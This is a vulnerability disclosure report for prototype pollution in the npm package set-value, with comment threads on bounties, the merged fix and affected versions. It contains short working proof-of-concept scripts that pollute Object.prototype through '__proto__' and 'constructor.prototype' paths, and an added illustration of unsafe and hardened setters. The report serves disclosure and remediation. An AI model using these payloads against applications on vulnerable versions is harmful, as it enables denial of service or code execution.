Prototype Pollution in jonschlinkert/set-value

Valid

Reported on Aug 30th 2021


✍️ Description

The set-value package is vulnerable to Prototype Pollution. The set function fails to validate which object properties it updates, so a caller who controls the property path can reach and modify the prototype of Object, adding a new property or modifying an existing one on all objects.

🕵️‍♂️ Proof of Concept

Create the following PoC file:

// poc.js
var setValue = require("set-value")
let obj = {}
console.log("Before: " + {}.polluted)
setValue(obj, [['__proto__'], 'polluted'], 'Yes! Its Polluted')
console.log("After: " + {}.polluted)

Execute the following commands in the terminal:

npm i set-value # Install affected module
node poc.js #  Run the PoC

Check the Output:

Before : undefined
After : Yes! Its Polluted
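As an added illustration, not part of the report and not set-value's own source: a simplified path-based setter in the same style, once without key validation (which both property paths from this report pollute) and once with the validation a fix needs, plus a check that Object.prototype is left clean. The names BLOCKED_KEYS, splitPath, unsafeSet, safeSet and demo are assumptions for this example.

```javascript
// Added illustration (not set-value's code); helper names are assumptions.
const BLOCKED_KEYS = new Set(["__proto__", "constructor", "prototype"]); // segments reaching Object.prototype

// Accepts "a.b.c", ["a", "b"], or nested arrays as in the PoC above.
function splitPath(path) {
  return Array.isArray(path) ? path.flat(Infinity).map(String) : String(path).split(".");
}

// Vulnerable pattern: descends through whatever a segment resolves to, including
// inherited values such as obj.__proto__ or obj.constructor.prototype.
function unsafeSet(target, path, value) {
  const keys = splitPath(path);
  let node = target;
  for (let i = 0; i < keys.length - 1; i++) {
    const cur = node[keys[i]];
    if (!((typeof cur === "object" && cur !== null) || typeof cur === "function")) node[keys[i]] = {};
    node = node[keys[i]];
  }
  node[keys[keys.length - 1]] = value;
  return target;
}

// Hardened pattern: reject blocked segments up front and descend only into own,
// plain-object properties, so the prototype chain is never reachable.
function safeSet(target, path, value) {
  const keys = splitPath(path);
  const bad = keys.find((k) => BLOCKED_KEYS.has(k));
  if (bad !== undefined) throw new TypeError(`refusing to set key "${bad}"`);
  let node = target;
  for (let i = 0; i < keys.length - 1; i++) {
    const cur = Object.prototype.hasOwnProperty.call(node, keys[i]) ? node[keys[i]] : undefined;
    if (typeof cur !== "object" || cur === null) node[keys[i]] = {};
    node = node[keys[i]];
  }
  node[keys[keys.length - 1]] = value;
  return target;
}

// Runs one PoC path through both setters and reports what a fresh {} sees,
// restoring the real Object.prototype afterwards so the process stays clean.
function demo(path) {
  const out = { afterUnsafe: undefined, safeRejected: false, afterSafe: undefined };
  try { unsafeSet({}, path, "Yes! Its Polluted"); out.afterUnsafe = {}.polluted; }
  finally { delete Object.prototype.polluted; }
  try { safeSet({}, path, "Yes! Its Polluted"); }
  catch (e) { out.safeRejected = e instanceof TypeError; }
  out.afterSafe = {}.polluted;
  delete Object.prototype.polluted;
  return out;
}

console.log(demo([["__proto__"], "polluted"]), demo([["constructor"], ["prototype"], "polluted"]));
```

The second path is the constructor.prototype variant posted later in this thread; both pollute through unsafeSet and both are refused by safeSet, while ordinary paths such as "a.b.c" still work.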

💥 Impact

It may lead to Information Disclosure/DoS/RCE.

ready-research submitted a
2 months ago
ready-research
2 months ago

Researcher


var setValue = require("set-value")
let obj = {}
console.log("Before: " + {}.polluted)
setValue(obj, [['constructor'],['prototype'], 'polluted'], 'Yes! Its Polluted')
console.log("After: " + {}.polluted)

Jon Schlinkert validated this vulnerability a month ago
ready-research has been awarded the disclosure bounty
The fix bounty is now up for grabs
ready-research
a month ago

Researcher


@admin @adam please read the comments in https://github.com/jonschlinkert/set-value/pull/33

Jamie Slome
a month ago

Admin


@ready-research - I have commented on the GitHub pull request.

Chad Whitacre
a month ago

Based on the PR in set-value it seems that @ready-research should be awarded the fix bounty. Is there no way to do that without the repo maintainer's cooperation? Clearly you can't force the repo maintainer to cooperate, and it seems unfair to @ready-research not to override somehow here.

Jamie Slome
a month ago

Admin


@chad - we are improving our automation in this - generally our system would have picked it up if the permalink reference in the report had matched that of the fix.

But seeing as @ready-research's fix was used - we will definitely look to reward the bounty here.

Thanks for your feedback! 🎉

Jamie Slome confirmed that a fix has been merged on b057b1 a month ago
ready-research has been awarded the fix bounty
Jamie Slome
a month ago

Admin


@ready-research - just a heads up that in the future, avoid opening the PR in public, as it can break the responsible disclosure.

Great work all!

ready-research
a month ago

Researcher


@chad Thank you.

@jamie Yeah, sure. Thanks.

webbusiness2019
9 days ago

Where do I create poc.js? It throws an error:

TypeError: Object keys must be strings or symbols
    at validateKey (E:\WebBusiness\App\MyBusinessCard\node_modules\set-value\index.js:24:11)
    at setValue (E:\WebBusiness\App\MyBusinessCard\node_modules\set-value\index.js:141:5)
    at Object.<anonymous> (E:\WebBusiness\App\MyBusinessCard\poc.js:5:1)

ready-research
9 days ago

Researcher


@webbusiness2019 This issue got fixed in the latest version. Please try this in the vulnerable version.

webbusiness2019
9 days ago

This error is totally new for me, so I can not get your point, and I am new to react-native so I don't know where to find the vulnerable version... Can you please explain in detail?

ready-research
9 days ago

Researcher


@webbusiness2019 set-value 4.0.0 is vulnerable. Fixed in 4.0.1. Use the commands below to install the vulnerable version and run the code.

npm i set-value@4.0.0
node poc.js

Jacob Wejendorp
5 days ago

According to my testing, v2.0.1 is another safe release. If we can confirm this, can you help get the CVE/CPE corrected to show < 2.0.1, >= 3.0.0 < 4.0.1?

Jamie Slome
5 days ago

Admin


@jacob - Snyk published this CVE, so your best bet is to get in touch with their security researcher team ❤️

Jacob Wejendorp
5 days ago

Thanks Jamie, will do.